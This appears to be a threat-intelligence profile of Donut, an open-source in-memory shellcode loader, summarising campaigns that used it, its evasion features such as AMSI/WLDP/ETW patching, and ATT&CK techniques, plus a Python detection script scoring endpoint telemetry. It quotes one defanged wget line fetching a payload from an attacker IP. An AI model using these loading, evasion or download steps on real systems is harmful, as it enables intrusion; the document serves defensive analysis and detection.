Donut
Donut is an open-source shellcode generation and in-memory loader framework for Windows payloads. It generates position-independent shellcode that can load and execute .NET assemblies, PE files (EXEs and DLLs), and scripts such as VBScript and JScript/JavaScript directly from memory, and it can emit that shellcode in formats usable from PowerShell and Ruby. Donut is designed for fileless or memory-resident execution and has been observed allocating executable memory, reflectively loading embedded payloads, manually mapping final PE payloads, and in some cases supporting staged delivery with HTTP request/response logic to retrieve additional payloads. Reported defense-evasion features include patching AMSI, WLDP, and sometimes ETW in-process, patching exit-related Native API functions to avoid process termination, and erasing in-memory file references to payloads after reflective loading. Donut uses the Chaskey block cipher in CTR mode as part of payload protection. It also includes a DonutTest subproject for injecting shellcode into a target process.
Across the provided reporting, Donut is used as a loader component rather than the final malware family. It has been observed in multiple intrusion chains:
Rapid7 reported Dropping Elephant using a malicious LNK, PowerShell staging, scheduled task persistence, and DLL side-loading via Fondue.exe and APPWIZ.cpl to decrypt an AES-256-CBC protected blob from editor.dat, execute Donut shellcode, patch AMSI/WLDP/ETW, and in-memory load a final 32-bit RAT communicating with gcl-power.org.
BI.ZONE reported Fluffy Wolf using Rust-based loaders running Donut shellcode to deliver payloads including Pay2Key, PureLogs, and PureRAT into processes such as RegAsm.exe, InstallUtil.exe, and MSBuild.exe against Russian organizations in construction, consulting, manufacturing, engineering, retail, and e-commerce.
Sophos observed Chinese state-directed Operation Crimson Palace increasingly using Donut loaders alongside Havoc, Cobalt Strike, XieBroC2, ExecIT, Alcatraz, and RealBlindingEDR in attacks on Southeast Asian government and public-service organizations, including Donut-based injection of Havoc or Cobalt Strike into svchost.exe.
Gurucul described a ClickFix campaign using canndelta.com, malicious PowerShell, Donut shellcode, RWX memory allocation, and in-memory .NET loading to deliver PureLogs.
Cato reported a TencShell intrusion against a global manufacturing company in which a first-stage dropper fetched a disguised .woff file containing Donut shellcode that reflectively loaded the final implant.
Sophos also documented AI-themed malware delivery via claude-pro.com where DLL sideloading decrypted Donut shellcode that loaded the Beagle backdoor.
Securonix described SERPENTINE#CLOUD using Donut as a recurring bridge between Python loaders and final .NET RATs such as PureLogs, AsyncRAT, VenomRAT, Violet RAT, DcRat, PureHVNC, and XWorm.
High-confidence indicators directly tied to Donut in the content are primarily behavioral rather than static: in-memory execution of Windows payloads; RWX or executable memory allocation; reflective/manual mapping of embedded PE or .NET payloads; AMSI/WLDP and sometimes ETW patching; Chaskey-protected embedded payloads; staged HTTP retrieval in configured variants; and shellcode execution/injection via helper tooling such as DonutTest. The content does not provide a single canonical actor attribution for Donut itself because it is an open-source tool reused by multiple threat actors and campaigns.
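The behavioral indicators above can be turned into a simple host-scoring rule. The following is an added example, not code from the Mallory page or the Donut project: it scores constructed endpoint-telemetry events against the indicators the page names (RWX allocation, injection into the .NET host processes listed above, in-process AMSI/WLDP/ETW patching, and a payload masquerading as a .woff asset). The event schema, the weights, and the threshold are assumptions.

```python
# Added example: score constructed telemetry against the Donut behaviours the page lists.
# Event schema, indicator weights and the alert threshold are assumptions, not a vendor format.
from collections import defaultdict

# Injection targets named on the page for Donut-delivered payloads.
DOTNET_HOSTS = {"regasm.exe", "installutil.exe", "msbuild.exe", "svchost.exe"}
# Modules whose in-process patching the page describes (AMSI, WLDP, ETW lives in ntdll).
PATCHED_MODULES = {"amsi.dll", "wldp.dll", "ntdll.dll"}

# Indicator weights (assumed): the patching behaviour is the strongest single signal.
WEIGHTS = {"rwx_alloc": 2, "remote_thread": 2, "inproc_patch": 3, "font_masquerade": 1}


def classify(event):
    """Map one event dict to an indicator name from WEIGHTS, or None if it matches nothing."""
    kind = event.get("kind")
    if kind == "mem_alloc" and event.get("protect") == "RWX":
        return "rwx_alloc"
    if kind == "remote_thread" and event.get("target", "").lower() in DOTNET_HOSTS:
        return "remote_thread"
    if kind == "api_patch" and event.get("module", "").lower() in PATCHED_MODULES:
        return "inproc_patch"
    # A .woff URL whose response is not actually a font is the masquerade the page describes.
    if (kind == "http_get" and event.get("url", "").lower().endswith(".woff")
            and event.get("content_type", "") != "font/woff"):
        return "font_masquerade"
    return None


def score_hosts(events, threshold=5):
    """Return {host: (score, sorted indicators)} for hosts whose distinct indicators reach threshold."""
    seen = defaultdict(set)
    for ev in events:
        indicator = classify(ev)
        if indicator:
            seen[ev["host"]].add(indicator)
    result = {}
    for host, indicators in seen.items():
        score = sum(WEIGHTS[i] for i in indicators)
        if score >= threshold:
            result[host] = (score, sorted(indicators))
    return result


# Constructed sample telemetry; the hostnames, URLs and process names are not real IOCs.
SAMPLE_EVENTS = [
    {"host": "ws01", "kind": "http_get", "url": "https://cdn.example.invalid/a.woff", "content_type": "application/octet-stream"},
    {"host": "ws01", "kind": "mem_alloc", "protect": "RWX", "process": "powershell.exe"},
    {"host": "ws01", "kind": "api_patch", "module": "amsi.dll"},
    {"host": "ws01", "kind": "remote_thread", "source": "loader.exe", "target": "RegAsm.exe"},
    {"host": "ws02", "kind": "mem_alloc", "protect": "RWX", "process": "jitted.exe"},  # benign JIT noise
    {"host": "ws02", "kind": "http_get", "url": "https://fonts.example.invalid/b.woff", "content_type": "font/woff"},
]

if __name__ == "__main__":
    for host, (score, indicators) in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: score={score} indicators={indicators}")
```

Requiring several distinct indicators before alerting is what keeps a lone RWX allocation from a JIT-compiled process (ws02 above) from paging anyone.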
Groups observed using it
9 distinct threat actors attributed by public researchers.
The loader decrypts an AES-wrapped payload stored on disk. The decrypted payload contains a Donut shellcode loader that embeds the final RAT and uses Chaskey block cipher as part of its payload protection scheme. Donut then decrypts the final 32-bit native RAT, maps it, and executes it in memory.
While they still leverage classic droppers like PureCrypter and Rust-based loaders running Donut shellcode, they have added a potent new tool to their arsenal: PowerLoader.
Donut is an open-source position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files, and dotNET assemblies. In this attack, Donut is used to decrypt and execute the Atlantida stealer inside the RegAsm.exe process memory.
This decrypted payload is Donut (aka DonutLoader, aka donut_injector) shellcode – an open-source, in-memory loader.
The decrypted shellcode is a Donut loader -- a framework for generating position-independent shellcode from PE files, .NET assemblies, and other executable formats.
We decrypted these and found new malware, including DaveShell and Donut loader, which are two open-source loaders being observed for the first time in Tropic Trooper activity.
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
6 techniques
APT19 downloaded and launched code within a SCT file; APT32 used COM scriptlets to download Cobalt Strike beacons; APT37 used Ruby scripts to execute payloads; ArcaneDoor included the adversary executing command line interface (CLI) commands.
This research analyzes a ClickFix campaign leveraging the spoofed licensing-themed website canndelta.com to deliver the PureLogs stealer through malicious PowerShell commands.
Inside that file was Donut shellcode, an open-source tool capable of loading Windows payloads directly in memory.
AppleSeed has the ability to use JavaScript to execute PowerShell. APT32 has used JavaScript for drive-by downloads and C2 communications. Astaroth uses JavaScript to perform its core functionalities.
Privilege Escalation
1 technique
Stealth
10 techniques
The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
The dropper then retrieved what appeared to be a standard web font file with a .woff extension, the kind websites routinely use to load custom typefaces. Inside that file was Donut shellcode.
The next stage involved retrieving Donut shellcode through a masqueraded .woff resource... By placing malicious content behind a font-looking path or extension, the attacker makes the payload request appear like a routine static web asset.
using a custom malware loader called HUI loader to inject a Cobalt Strike beacon into the Remote Desktop utility mstsc.exe... the attackers used the Havoc tool to inject code into other processes
The sideloaded DLL decrypts the encrypted payload in NOVupdate.exe.dat by reversing it and XORing it with the key... The malware then executes the decrypted shellcode
Ironically, the actors used a malware protection product to execute the EDR killer to create an execution chain that would appear to be “safe” to other malware protection tools... leveraging kaba.exe, a renamed version of a legitimate Kaspersky executable
They also used anti-analysis methods, which suggests a “codebase continuity rather than a short-lived ‘smash-and-grab’ campaign.”
Credential Access
1 technique
Discovery
2 techniques
Command and Control
2 techniques
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
Examples include: "APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits," "During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads," and multiple malware families "use HTTP GET requests" or similar to download files/payloads.
IOCs tracked for this family
67 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
68 sources tracked across advisories, community write-ups, and news.
Donut is used as an in-memory shellcode loader that decrypts and maps the final RAT into memory without writing it to disk, while also patching AMSI, WLDP, and ETW in-process to reduce detection.
Shellcode used with Rust-based loaders as part of Fluffy Wolf delivery chains.
Donut is used in this campaign as shellcode to enable fileless execution and in-memory .NET assembly loading, helping evade detection during delivery of the PureLogs stealer.
Donut is an open-source in-memory shellcode loader used in the attack chain to load Windows payloads reflectively into memory without writing them to disk, enabling stealthy execution of TencShell.